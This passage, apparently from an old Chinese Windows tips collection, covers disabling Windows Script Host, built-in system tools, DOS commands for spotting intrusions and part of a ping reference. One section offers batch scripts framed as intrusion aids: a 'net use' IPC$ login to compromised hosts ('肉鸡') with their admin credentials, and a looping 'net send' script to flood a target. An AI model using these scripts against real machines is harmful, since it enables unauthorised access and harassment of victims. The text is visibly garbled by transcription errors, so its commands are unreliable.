位于WINDOWS所在文献夹下，所以它可以像执行批解决文献同样执行WSH脚本程序〜

解决方法：1）更新您的浏览器，使用最新的浏览器上网！

2）修改msdos.sys,在其中加入：Bootmentu=0命令行，目的是禁用启动菜单。

3）吧改名

4）禁用WSH。具体方法：在\vin98中，从添加删除程序中点击WINDOWS安装程序，打开附

件一项，将WINDOWSSCRIPTINGHOST前面的选项去掉，就可以卸载掉WSH了〜〜〜win2023

和xp的用户可以在我的电脑-工具菜单-文献夹选项-选择文献类型，找到VBSVBSCRIPTFILE

选项，点击删除！

29）系统自带的系统工具

其实无论大家从什么地方，什么方法找到一些好用的工具，都不如Windows自带的工具用着

方便（假设你区的地方正好不能上网，而你又没有准备好这些工具，那怎么办？呵呵，不用

着急，用好下面几个Windows自带的小工具，可以使你事半功倍！）

1、msinfo32.exe

位于C:\ProgramFiles\CommonFiles

MicrosoftShared\Msinfo\msinfo32.exe,显示计算机中的有关系统信息，可用其诊断、解

决计算机问题并查看远程系统所生成的系统报告。

2、drwatson.exe—这个工具给我特别的密切感觉：第一次使用这个工具是在看了LK007

大哥给cool兄弟的回复以后，我立即实验〜果然很故意思！LK007不愧是大哥！现在想起

来都佩服不已~~~

位于C:\Windows\drwatson.exe,当某个应用程序在运营过程中犯错时，它就会将犯错的

程序以及犯错的内存地址-一-记录下来，并保存为Windows的Drwatson子目录下的*.wig

记录文献。

3、sfc.exe

位于C:\Windows\System\sfc.exe,用于自动搜索被改变、删除或损坏了的系统文献。

4、msconfig.exe

位于C:\Windows\System\msconfig.exe,通过修改启动方式以及启动时运营哪些应用程序

等系统配置，从而达成快速排除故障的目的。

5、scanreg.exe

位于C:\windows\command\scanreg.exe（DOS版本）及C:\windows\scanregw.exe（Windows

版本），用于检查、修复、备份以及还原系统注册表及相关配置文献的工具软件，防止因注

册表数据被破坏而导致的系统故障。

6^vcmui.exe

位于C:\Windows\vcmui.6X6,在后台自动将被覆盖的驱动程序备份下来，当我们安装的新

驱动犯错时可用它进行恢复。

7、winrep.exe

位于C:\Windows\winrep.exe,能自动收集有关系统信息并提醒用户输入故障所在，帮我们

编写一篇完整的“求援”报告，并将其发送给有关技术维护人员，简化“求援”操作。

这七个Windows自带的小程序可以在开始菜单一运营中直接输入文献名（无需输入扩展名）

调出该程序！

30）批解决在入侵中的几则妙用！

A、简化IPC$登陆肉鸡的操作：

用记事本建立一个名字为：ipcruqin.bat的批解决文献，内容如下：

©netuse\\%l\ipc$%3

©echoOK!已经成功建立连接

之后，大家在CMD下输入：ipcruqin.bat肉鸡IP肉鸡的admin帐号/用户的密码。就可以

登陆上去了，而不需要那一大长串的命令了！

B、批解决轰炸对方电脑：

打开一记事本，在里面输入如下内容：

©echo正在轰炸中...

tart

©netsend%1%2

©iferrorlevel1gotoover

gotostart

ver

©echo发送失败

将其保存为bat格式的文献即可，使用方法：*.bat（该批解决文献的名字）+空格+目的

IP+空格+你要对他说得话！

这次先简朴介绍这三个！等下次有机会再给大家介绍更多的批解决文献的用途！

31）再说几个非常简朴实用的DOS命令（工具）：

A、fport.exe一查看那些端口都是那些程序使用的命令。

B、netstat-an一查看那些端口于外部的IP连接。比如这里显示：23XX.XX.XX.XX而你

又没有开23端口，那么，呵呵……还用我说么？

C、letmain.exe\\ip-admin-d一列出本机的administrators组的用户名查看是否有异

常。

D、pslist.exe一列出进程

E、pskill.exe一杀掉进程，有时候再任务管理器中无法终止程序，那就用这个工具来停止

进程。

F、login.exe一列出当前有那些用户登陆再你的机器上。

ping命令详解

ping[-t][-a][-ncount][-1length][-f][-ittl][-vtos][-rcount][-scount]

[[-jcomputer-list]|[-kcomputer-list]][-wtimeout]destination-list

Options:

-tPingthespecifiedhostuntilstopped.Tose